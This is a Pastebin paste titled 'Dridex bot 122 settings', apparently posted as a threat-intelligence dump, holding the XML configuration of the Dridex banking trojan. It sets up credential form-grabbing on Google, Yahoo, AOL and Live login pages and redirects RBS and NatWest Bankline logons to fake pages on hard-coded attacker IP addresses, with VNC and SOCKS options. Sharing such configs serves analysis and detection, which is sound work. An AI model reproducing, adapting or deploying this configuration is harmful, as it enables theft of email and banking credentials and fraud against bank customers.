Advertisement
Matthewm

Dridex bot 122 settings

May 12th, 2015
376
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.69 KB | None | 0 0
  1. Dridex bot 122 settings
  2. <settings hash="b6c969f81bd2a6352ad6d1fc86f9807d92edac65">
  3. <httpshots>
  4. <url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
  5. <url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url>
  6. </httpshots>
  7. <formgrabber>
  8. <url type="deny">\.(swf)($|\?)</url>
  9. <url type="deny">/isapi/ocget.dll</url>
  10. <url type="allow">^https?://aol.com/.*/login/</url>
  11. <url type="allow">^https?://accounts.google.com/ServiceLoginAuth</url>
  12. <url type="allow">^https?://login.yahoo.com/</url>
  13. <url type="allow">^https?://login.live.com/</url>
  14. <url type="deny">^https?://(\w+\.)?aol.com</url>
  15. <url type="deny">^https?://(\w+\.)?facebook.com/</url>
  16. <url type="deny">^https?://(\w+\.)?google</url>
  17. <url type="deny">^https?://(\w+\.)?yahoo</url>
  18. <url type="deny">^https?://(\w+\.)?youtube.com</url>
  19. <url type="deny">^https?://(\w+\.)?live.com</url>
  20. <url type="deny">^https?://(\w+\.)?twitter.com</url>
  21. <url type="deny">^https?://(\w+\.)?vk.com</url>
  22. <url type="deny">^https.*ocsp\..+$</url>
  23. <url type="deny">^https.*safebrowsing\..+$</url>
  24. <url type="deny">^https?://fhr\.data\.mozilla\.com</url>
  25. <url type="deny">^https://s.*\.symcd\.com</url>
  26. <url type="deny">^https://s.*\.symcb\.com</url>
  27. <url type="deny">^https.*ocsp2\..+$</url>
  28. <url type="deny">localhost.+skypectoc/.+$</url>
  29. <url type="deny">\.messenger\.live\.com</url>
  30. <url type="deny">pipe\.skype\.com</url>
  31. <url type="deny">\.optimatic\.com</url>
  32. <url type="deny">hiro\.tv</url>
  33. <url type="deny">spotxchange\.com</url>
  34. <url type="deny">nielsen\.com</url>
  35. <url type="deny">mapquest\.com </url>
  36. <url type="deny">^https://.+\.skype\.com/api/</url>
  37. <url type="deny">(//|\.)lphbs.com</url>
  38. <url type="deny">(//|\.)zynga.com</url>
  39. </formgrabber>
  40. <redirects>
  41. <redirect name="1st" vnc="0" socks="0" uri="http://62.109.4.230:8080/addons" timeout="20">twister5.js</redirect>
  42. <redirect name="2nd" vnc="1" socks="1" uri="http://62.109.4.230:8080/webuibuilder" timeout="20">commonuifunc.js</redirect>
  43. <redirect name="tgp" vnc="1" socks="1" uri="http://62.109.4.230:8080/webuibuilder" timeout="20">notracking.js</redirect>
  44. <redirect name="rbs_fake" vnc="0" socks="0" uri="http://188.226.168.84:8080/fakes/rbs_logon/sys.php" timeout="40">https://www.bankline.rbs.com/</redirect>
  45. <redirect name="natwest_fake" vnc="0" socks="0" uri="http://188.226.168.84:8080/fakes/natwest_logon/sys.php" timeout="40">https://www.bankline.natwest.com/</redirect>
  46. </redirects>
  47. <httpinjects />
  48. </settings>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement